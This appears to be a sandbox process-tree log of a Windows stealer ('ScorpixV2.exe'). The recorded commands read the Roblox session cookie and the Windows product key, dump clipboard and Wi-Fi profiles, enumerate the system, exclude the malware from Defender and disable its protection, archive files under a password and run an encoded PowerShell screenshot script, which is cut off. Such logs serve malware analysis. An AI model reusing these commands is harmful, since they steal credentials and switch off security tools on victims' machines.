- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:228
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:4760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4308
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI14602\rar.exe a -r -hp"yelex123" "C:\Users\Admin\AppData\Local\Temp\lmLek.zip" *"
    3⤵
    PID:4956
  - - C:\Users\Admin\AppData\Local\Temp\_MEI14602\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI14602\rar.exe a -r -hp"yelex123" "C:\Users\Admin\AppData\Local\Temp\lmLek.zip" *
      4⤵
      Executes dropped EXE
      PID:4992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4936
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:3432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:5136
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:5836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4768
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:2908
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:452
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:5340
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1796

C:\Users\Admin\Downloads\ScorpixV2.exe
"C:\Users\Admin\Downloads\ScorpixV2.exe"
1⤵
- Executes dropped EXE
PID:4692
- C:\Users\Admin\Downloads\ScorpixV2.exe
  "C:\Users\Admin\Downloads\ScorpixV2.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  PID:5092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\ScorpixV2.exe'"
    3⤵
    PID:952
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\ScorpixV2.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    PID:2624
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    PID:4020
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    PID:4740
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      PID:2780
    - - C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        bound.exe
        5⤵
        Executes dropped EXE
        
        PID:920
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:964
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        6⤵
        
        PID:5756
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        7⤵
        Detects videocard installed
        
        PID:5652
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
        6⤵
        
        PID:5332
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get Manufacturer
        7⤵
        
        PID:5296
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "gdb --version"
        6⤵
        
        PID:6040
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        6⤵
        
        PID:5848
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:5048
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
        6⤵
        
        PID:5340
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_ComputerSystem get Manufacturer
        7⤵
        
        PID:2312
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        6⤵
        
        PID:4584
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        7⤵
        
        PID:3436
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        6⤵
        
        PID:844
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:3236
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        6⤵
        
        PID:1716
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:2596
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        6⤵
        
        PID:5484
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        7⤵
        
        PID:5208
        
        C:\Windows\system32\chcp.com
        
        chcp
        8⤵
        
        PID:3192
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        6⤵
        
        PID:4860
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        7⤵
        
        PID:5712
        
        C:\Windows\system32\chcp.com
        
        chcp
        8⤵
        
        PID:4088
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:4488
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        
        PID:3568
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
        6⤵
        Clipboard Data
        
        PID:3496
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:844
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Get-Clipboard
        7⤵
        Clipboard Data
        
        PID:5692
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        6⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1316
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        7⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5236
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
        6⤵
        Network Service Discovery
        
        PID:5560
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        7⤵
        Gathers system information
        
        PID:5964
        
        C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        7⤵
        
        PID:5452
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        7⤵
        Collects information from the system
        
        PID:5884
        
        C:\Windows\system32\net.exe
        
        net user
        7⤵
        
        PID:2168
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        8⤵
        
        PID:6024
        
        C:\Windows\system32\query.exe
        
        query user
        7⤵
        
        PID:4836
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        8⤵
        
        PID:5468
        
        C:\Windows\system32\net.exe
        
        net localgroup
        7⤵
        
        PID:5944
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        8⤵
        
        PID:3312
        
        C:\Windows\system32\net.exe
        
        net localgroup administrators
        7⤵
        
        PID:5328
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        8⤵
        
        PID:5056
        
        C:\Windows\system32\net.exe
        
        net user guest
        7⤵
        
        PID:5240
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        8⤵
        
        PID:2944
        
        C:\Windows\system32\net.exe
        
        net user administrator
        7⤵
        
        PID:1336
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        8⤵
        
        PID:4628
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic startup get caption,command
        7⤵
        
        PID:5492
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /svc
        7⤵
        Enumerates processes with tasklist
        
        PID:2312
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        7⤵
        Gathers network information
        
        PID:4340
        
        C:\Windows\system32\ROUTE.EXE
        
        route print
        7⤵
        
        PID:1508
        
        C:\Windows\system32\ARP.EXE
        
        arp -a
        7⤵
        Network Service Discovery
        
        PID:5376
        
        C:\Windows\system32\NETSTAT.EXE
        
        netstat -ano
        7⤵
        System Network Connections Discovery
        Gathers network information
        
        PID:2816
        
        C:\Windows\system32\sc.exe
        
        sc query type= service state= all
        7⤵
        Launches sc.exe
        
        PID:5896
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall show state
        7⤵
        Modifies Windows Firewall
        
        PID:2904
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall show config
        7⤵
        Modifies Windows Firewall
        
        PID:208
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        6⤵
        
        PID:2988
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        7⤵
        
        PID:3532
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        6⤵
        
        PID:5496
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        7⤵
        
        PID:5652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5132
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:5900
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:3684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    PID:4064
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    PID:4996
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:2920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:5984
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:5444
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍‎ ‏‌.scr'"
    3⤵
    PID:3380
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍‎ ‏‌.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5172
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2688
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:5152
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:4808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3352
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:5940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3584
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1784
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4408
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:5900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:4752
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:5628
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:1328
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAd